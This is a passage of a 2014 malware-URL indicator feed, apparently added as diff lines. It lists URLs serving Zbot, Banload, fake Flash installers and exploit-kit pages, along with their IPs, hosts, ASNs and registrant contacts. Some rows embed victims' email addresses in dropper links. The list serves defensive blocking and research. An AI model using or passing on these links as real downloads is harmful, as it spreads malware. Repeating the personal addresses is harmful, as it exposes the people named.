Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/advocacia.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/bo_03.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/bo_01.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/bo_02.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/ch_01.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/hven_04.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/hven_03.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/hven_02.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/hven_01.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/re_02.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/pe_02.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", 
+"2014/07/30_23:56","ministerio-publi.info/web/pe/ad_04.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/pe_01.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/ad_03.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/ad_02.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/pe/ad_01.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/serasa/serasa_02.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/serasa/serasa_01.php","192.3.1.250","-","Leads to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/28_09:24","-","94.249.192.105/index.html","-","leads to ransom trojan message page","-","12586","0","DE", +"2014/07/24_12:58","dentairemalin.com/images/report934875438jdfg8i45jg_07242014.exe","217.16.10.2","clweb01.hosteur.com.","Trojan.Banker","-","48809","0","FR", +"2014/07/24_12:53","mathenea.com/css/report934875438jdfg8i45jg_07242014.exe","91.199.120.78","mazer.h3m.com.","Trojan.Banker","Registrant ghm007@hotmail.com","15699","0","ES", +"2014/07/24_09:31","-","117.21.191.47/ng15.exe","-","Win32/Cryptor","-","4134","0","CN", +"2014/07/24_09:31","-","117.21.191.47/bet15.exe","-","Win32/Cryptor","-","4134","0","CN", +"2014/07/24_09:31","-","117.21.191.47/ng.exe","-","W32/Slenfbot.B.gen!Eldorado","-","4134","0","CN", 
+"2014/07/24_09:31","-","117.21.191.47/beta.exe","-","Trojan.Ageny.ED","-","4134","0","CN", +"2014/07/24_09:31","-","117.21.191.47/betr7.exe","-","Win32/Cryptor","-","4134","0","CN", +"2014/07/24_09:31","-","117.21.191.47/ng2.exe","-","Win32/Injector.BHYG trojan","-","4134","0","CN", +"2014/07/24_09:31","-","117.21.191.47/ng1.exe","-","W32/Slenfbot.B.gen!Eldorado","-","4134","0","CN", +"2014/07/24_09:31","-","31.6.71.85/bet/ngr7.exe","hosted-by.slaskdatacenter.pl.","Trojan.Krypt","-","59491","0","PL", +"2014/07/24_09:31","-","117.21.191.47/andr7.exe","-","Win32/Cryptor","-","4134","0","CN", +"2014/07/24_09:31","-","31.6.71.85/bet/andr7.exe","hosted-by.slaskdatacenter.pl.","Trojan.Krypt","-","59491","0","PL", +"2014/07/24_09:31","-","31.6.71.85/bet/betr7.exe","hosted-by.slaskdatacenter.pl.","Trojan.Krypt","-","59491","0","PL", +"2014/07/24_09:31","-","31.6.71.85/bet/zpmr7.exe","hosted-by.slaskdatacenter.pl.","Trojan.Krypt","-","59491","0","PL", +"2014/07/23_09:27","adobeflashupdate14.com/version/install_flashplayer14.0.0.145_ie.exe","37.187.149.210","o1.i-whost.com.","fake Flash player","Registrant Email:salaiahai123@yahoo.com","16276","0","FR", +"2014/07/15_08:58","jue0jc.lukodorsai.info/dpta5n0tp2","192.200.105.135","192-200-105-135.static.gorillaservers.com.","exploit kit","shelly burch / qahumvfdfku@hotmail.com","53850","0","US", +"2014/07/15_07:26","www.m-barati.de/contao/count.php?id=4213245","94.101.38.14","three.rr1.revido.de.","leads to exploit kit","hostmaster@revido.de","16097","0","DE", +"2014/07/15_07:26","ylpzt.juzojossai.net/9aywse7eva","192.200.105.135","192-200-105-135.static.gorillaservers.com.","exploit kit","Registrar Abuse Contact abuse@web.com","53850","0","US", +"2014/07/11_08:26","directxex.com/uploads/1738599339.ms1.exe?dl=11738599339.ms1.exe","5.135.127.68","-","Trojan.Backdoor.Androm.Ar","Registrar Abuse Contact abuse@enom.com","16276","0","FR", 
+"2014/07/11_08:26","directxex.com/uploads/2126787896.lol.exe","5.135.127.68","-","RAR/Agent.AF","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/07/11_03:50","6b8a953b2bf7788063d5-6e453f33ecbb90f11a62a5c376375af3.r71.cf5.rackcdn.com/Videos%20Player.mp4.exe","64.210.100.99","-","Trojan.FakeAdobe","Registrar Abuse Contact abuse@ascio.com","3549","0","US", +"2014/06/26_14:27","www.cellularbeton.it/js/jquery.js","213.205.40.169","web-vip-it.eu.tiscali.it.","JS.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.frosinonewesternshow.it/fws2006/3tappa.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.archigate.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","JS.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.galileounaluna.com/","213.205.40.169","web-vip-it.eu.tiscali.it.","JS.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.vivaimontina.com/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.elisaart.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","JS.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.poesiadelsud.it/rende_16_05_07_saggese.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.frosinonewesternshow.it/fws2013/calendario.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.poesiadelsud.it/mostra_internazionale_artecont_1.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.poesiadelsud.it/rende_16_05_07_napolillo.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.anticarredodolomiti.com/index.html","213.205.40.169","web-vip-it.eu.tiscali.it.","JS.Exploit","Registrar Abuse Contact 
abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.gliamicidellunicef.it/skiantos_in_concerto.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.frosinonewesternshow.it/fws2011","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.frosinonewesternshow.it/fws2011/7tappa.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_0068.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_0138.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_9540.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_0119.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_9597.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_9551.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_9378.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", 
+"2014/06/26_14:27","www.fotoidea.com/sport/4x4_san_ponso/slides/IMG_9445.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.milardi.it/corteconti.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.milardi.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.frosinonewesternshow.it/fws2011/","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.bcservice.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.unicaitaly.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.montacarichi.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.assculturaleincontri.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.ristoromontebasso.it/scripts/menu.js","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.3difx.com","213.205.40.169","web-vip-it.eu.tiscali.it.","JS.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.3difx.com/serv010.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.chiaperottipaolo.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.marinoderosas.com/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", 
+"2014/06/26_14:27","www.riccardochinnici.it/","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","-","8612","0","IT", +"2014/06/26_14:27","www.eivamos.com/rimessaggio/carrelliconver.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.catgallery.com/email.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.vinyljazzrecords.com/japan.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.racingandclassic.com/pagineit/race.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.sbo.it/babylon.html","213.205.40.169","web-vip-it.eu.tiscali.it.","Script.Exploit, Embedded links leading to illegal pharma","-","8612","0","IT", +"2014/06/26_14:27","nmsbaseball.com/post.php?id=144840","96.0.115.64","rev.opentransfer.com.64.115.0.96.in-addr.arpa.","Exploit","Registrar Abuse Contact domainabuse@tucows.com","32392","0","US", +"2014/06/26_14:27","www.aerreravasi.com/filmestensibile/filmestensibile.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.aerreravasi.com/differenziata/differenziata.html","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.aerreravasi.com/chisiamo/chisiamo.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.aerreravasi.com/comeraggiungerci/comeraggiungerci.htm","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","Registrar Abuse Contact 
abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.aerreravasi.com/bolle/bolle.html","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/26_14:27","www.aerreravasi.com","213.205.40.169","web-vip-it.eu.tiscali.it.","iFrame.Exploit","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/06/22_16:25","-","198.15.67.177/D63A5E3246A.jpg","-","Trojan.Zbot","-","20454","0","US", +"2014/06/22_16:25","-","95.154.228.163/1/bot.exe","-","Trojan.Zbot","-","20860","0","GB", +"2014/05/27_04:02","www.sankyo.gr.jp/Pagamento.zip?mscfopoysckwdh","202.224.60.77","www.sankyo.gr.jp.","Trojan.Zbot","-","4685","0","JP", +"2014/05/27_04:02","www.sankyo.gr.jp/Pagamento.zip","202.224.60.77","www.sankyo.gr.jp.","Trojan.Extension.Exploit","-","4685","0","JP", +"2014/05/27_04:02","www.sankyo.gr.jp/Pagamento.zip?IIFEhTaalZlzYipWok","202.224.60.77","www.sankyo.gr.jp.","Trojan.Zbot","-","4685","0","JP", +"2014/05/27_04:02","www.rokus-tgy.hu/Pagamento.zip?IdjJzMrNmz","195.70.32.145","virtweb2.interware.hu.","Trojan.Zbot","-","5588","0","HU", +"2014/05/27_04:02","www.rokus-tgy.hu/Pagamento.zip","195.70.32.145","virtweb2.interware.hu.","Trojan.Extension.Exploit","-","5588","0","HU", +"2014/05/27_04:02","www.flowtec.com.br/vcard/Informazioni.zip","200.195.192.45","jurere.onda.com.br.","Trojan.Zbot","Onda Provedor de Serviços S/A / dominios@ondacorp.com.br","12140","0","BR", +"2014/05/27_04:02","www.flowtec.com.br/vcard/Informazioni.zip","200.195.192.45","jurere.onda.com.br.","Trojan.Extension.Exploit","Onda Provedor de Serviços S/A / dominios@ondacorp.com.br","12140","0","BR", +"2014/05/27_04:02","www.fabioalbini.com/Pay.zip","195.110.150.4","net150-004.mclink.it.","Trojan.Extension.Exploit","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/27_04:02","www.fabioalbini.com/Order.zip","195.110.150.4","net150-004.mclink.it.","Trojan.Extension.Exploit","Registrar Abuse Contact 
domainabuse@tucows.com","5396","0","IT", +"2014/05/27_04:02","www.fabioalbini.com/Pay.zip?2bMxG=heidi.kostic@aon.at","195.110.150.4","net150-004.mclink.it.","Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/27_04:02","www.fabioalbini.com/Pay.zip?2bMxG=heidi.kostic","195.110.150.4","net150-004.mclink.it.","Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/27_04:02","www.fabioalbini.com/Order.zip?YIjoBgGhCBbs","195.110.150.4","net150-004.mclink.it.","Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/27_04:02","www.fabioalbini.com/Order.zip?snaVs8Hxk1UBauZlc5pQcGW7","195.110.150.4","net150-004.mclink.it.","Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/05/27_04:02","www.emrlogistics.com/fr/to2.exe","103.14.120.121","103.14.120.121-static-reverse.gooddomainregistry.com.","Trojan.Inject","Registrar Abuse Contact abuse@gooddomainregistry.com","132322","0","IN", +"2014/05/27_04:02","www.cortesidesign.com/Avviso.zip","213.205.40.169","web-vip-it.eu.tiscali.it.","Trojan.Zbot","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/05/27_04:02","www.cortesidesign.com/Avviso.zip","213.205.40.169","web-vip-it.eu.tiscali.it.","Trojan.Inject","Registrar Abuse Contact abuse@ascio.com","8612","0","IT", +"2014/05/27_04:02","www.caue971.org/fckeditor/file/wwwntn24comnews/ntn24newsaccidenteautomovilisticoradamelfalcaomonaco2amtodaym.zip","213.186.33.19","cluster010.ovh.net.","Trojan.Agent.AI","Jack SAINSILY / sainsily.j@wanadoo.fr","16276","0","FR", +"2014/05/27_04:02","www.caue971.org/fckeditor/file/wwwntn24comnews/ntn24newsaccidenteautomovilisticoradamelfalcaomonaco2amtodaym.zip","213.186.33.19","cluster010.ovh.net.","Trojan.Zbot","Jack SAINSILY / sainsily.j@wanadoo.fr","16276","0","FR", +"2014/05/27_04:02","www.atousoft.com/img/2.exe","88.190.253.247","pf7-web.online.net.","Spyware.Zbot.VXGen","Registrar Abuse 
Contact abuse_2014+atousoft.com@bookmyname.com","12322","0","FR", +"2014/05/27_04:02","www.arkinsoftware.in/images/aveksynkens.exe","216.151.164.53","shared-hosting.njtech.com.","Spyware.Zbot.ED","jn prasad / jnprasad@arkinsoftware.com","7393","0","US", +"2014/05/27_04:02","writingassociates.com/img/lks.exe","205.186.183.232","ekiaioocio.gs07.gridserver.com.","Trojan.Agent.ED","Registrar Abuse Contact domainabuse@tucows.com","31815","0","US", +"2014/05/27_04:02","vmay.com/wordpress/wp-content/themes/twentytwelve/foot/185.exe","175.182.230.91","175-182-230-91.adsl.dynamic.seed.net.tw.","Spyware.Password","Registrar Abuse Contact abuse@enom.com","4780","0","TW", +"2014/05/27_04:02","troytempest.com/DHLDocument.zip","217.160.115.88","kundenserver.de.","Trojan.Email.Gen","Registrar Abuse Contact abuse@enom.com","8560","0","DE", +"2014/05/27_04:02","villalecchi.com/images/min/b41.exe","209.51.141.123","www.villalecchi.com.","Trojan.Inject","Registrar Abuse Contact onlinenic-enduser@onlinenic.com","3595","0","US", +"2014/05/27_04:02","troytempest.com/DHLDocument.zip","217.160.115.88","kundenserver.de.","Trojan.Zbot","Registrar Abuse Contact abuse@enom.com","8560","0","DE", +"2014/05/27_04:02","smartify.org/Debito.zip?pXDqOuKMAYTwa","199.204.248.108","cpanel08.myhostcenter.com.","Trojan.Zbot","Dheeraj Dasari / ddasari@hotmail.com","17054","0","US", +"2014/05/27_04:02","smartify.org/Informazioni.zip?CAZdpDwfNtUZHf","199.204.248.108","cpanel08.myhostcenter.com.","Trojan.Zbot","Dheeraj Dasari / ddasari@hotmail.com","17054","0","US", +"2014/05/27_04:02","sayherbal.com/snlatxow","108.163.178.131","-","Spyware.ZeuS.GO","-","32613","0","CA", +"2014/05/27_04:02","sasson-cpa.co.il/Progetto.zip?iWPpEOb","194.90.8.20","as.netvision.net.il.","Trojan.Zbot","-","1680","0","IL", +"2014/05/27_04:02","sasson-cpa.co.il/Progetto.zip","194.90.8.20","as.netvision.net.il.","Trojan.Extension.Exploit","-","1680","0","IL", 
+"2014/05/27_04:02","rainbowcolours.me.uk/z14.exe","46.30.212.183","-","Trojan.Zbot","Nominet UK / -","51468","0","DK", +"2014/05/27_04:02","rainbowcolours.me.uk/hp.exe","46.30.212.183","-","Spyware.Zbot","Nominet UK / -","51468","0","DK", +"2014/05/27_04:02","rainbowcolours.me.uk/g17.exe","46.30.212.183","-","Trojan.Zbot.RPE","Nominet UK / -","51468","0","DK", +"2014/05/27_04:02","optiker-michelmann.de/eoewdksna","81.169.145.155","w9b.rzone.de.","Spyware.ZeuS.GO","hostmaster@strato.de","6724","0","DE", +"2014/05/27_04:02","progettocrea.org/wp-content/themes/telekom/telekom_deutschland_gmbh","109.168.109.228","board02.windows.kolst.it.","Trojan.Email.FakeDoc","Contact Privacy Inc. Customer 0136432151 / progettocrea.org@contactprivacy.com","5602","0","IT", +"2014/05/27_04:02","ns1.the-sinner.net/modules/webstat/vodafone_service_d2","89.169.174.218","-","Trojan.Email.FakeDoc","Registrar Abuse Contact tld-abuse@nic.ru","31514","0","RU", +"2014/05/27_04:02","nkgamers.com/swazi/banalities.exe","173.254.28.89","just89.justhost.com.","Spyware.ZeuS.GO","Registrar Abuse Contact abuse@enom.com","46606","0","US", +"2014/05/27_04:02","neumashop.cl/bmfbnoou","190.98.227.154","gtd154.dch.cl.","Spyware.ZeuS.GO","-","14259","0","CL", +"2014/05/27_04:02","nctbonline.co.uk/InvoiceCopy.scr","37.9.169.15","lb-proxy-13.websupport.sk.","Trojan.Zbot","Websupport, s.r.o. 
/ -","51013","0","SK", +"2014/05/27_04:02","ms11.net/%7Ecarmine/DHL%20Document.zip","108.168.210.189","ms11.net.","Trojan.Zbot","Registrar Abuse Contact onlinenic-enduser@onlinenic.com","36351","0","US", +"2014/05/27_04:02","mediatrade.h19.ru/Our","89.108.91.183","double6.holm.ru.","Produce Items.scr Trojan.Email.FakeDoc","-","43146","0","RU", +"2014/05/27_04:02","mahindrainsurance.com/Informazioni/risposta_info_1103.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Extension.Exploit","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Informazioni/mail_info_11032014.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Extension.Exploit","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Informazioni/Conferma.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Extension.Exploit","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/Mail_Info_11032014.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/conferma.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Download_Risposta/Risposta.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Download_Risposta/Mail_Info_11032014.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", 
+"2014/05/27_04:02","mahindrainsurance.com/download_doc/Risposta_Info_1103.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_doc/risposta.zip","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/informazioni/risposta_info_1103.zip?david.cozens+at+martindale.com_rdynpk7uwzi","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/informazioni/risposta_info_1103.zip?david.cozens%20at%20martindale.com_rdynpk7uwzi","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/informazioni/risposta_info_1103.zip?david.cozens","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/informazioni/risposta_info_1103.zip?abstracts%20at%20ages.com.au_yzoxmlfe0f","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/informazioni/mail_info_11032014.zip?selene-68b%20at%20libero.it","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Informazioni/Conferma.zip?aannuzzo574@libero.it","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", 
+"2014/05/27_04:02","mahindrainsurance.com/info/mail_info_11032014.zip?lerchc@kliniken-koeln.de_yex86uhg","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/mail_info_11032014.zip?itas00@virgilio.it_skwsq","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/mail_info_11032014.zip?itas00","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Info/Mail_Info_11032014.zip?58311xaNf5r7s","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/mail_info_11032014.zip?2472316zzqa1knqcgu","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Info/Mail_Info_11032014.zip?11870953rILDR","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Info/Mail_Info_11032014.zip?02127pOiaw5LoQ","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/info/conferma.zip?michele.armaniniatlibero.it_uubafwuh","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", 
+"2014/05/27_04:02","mahindrainsurance.com/Download_Risposta/Risposta.zip?9949971rMqgj20wKB","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_risposta/mail_info_11032014.zip?90460199329lkggbup0","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/Download_Risposta/Mail_Info_11032014.zip?15844470966vrURcZ","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", +"2014/05/27_04:02","mahindrainsurance.com/download_doc/risposta_info_1103.zip?dbspa3@actaliscertymail.it_i8dqtqvi","203.123.178.30","piin178030.pacific.net.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","9625","0","IN", 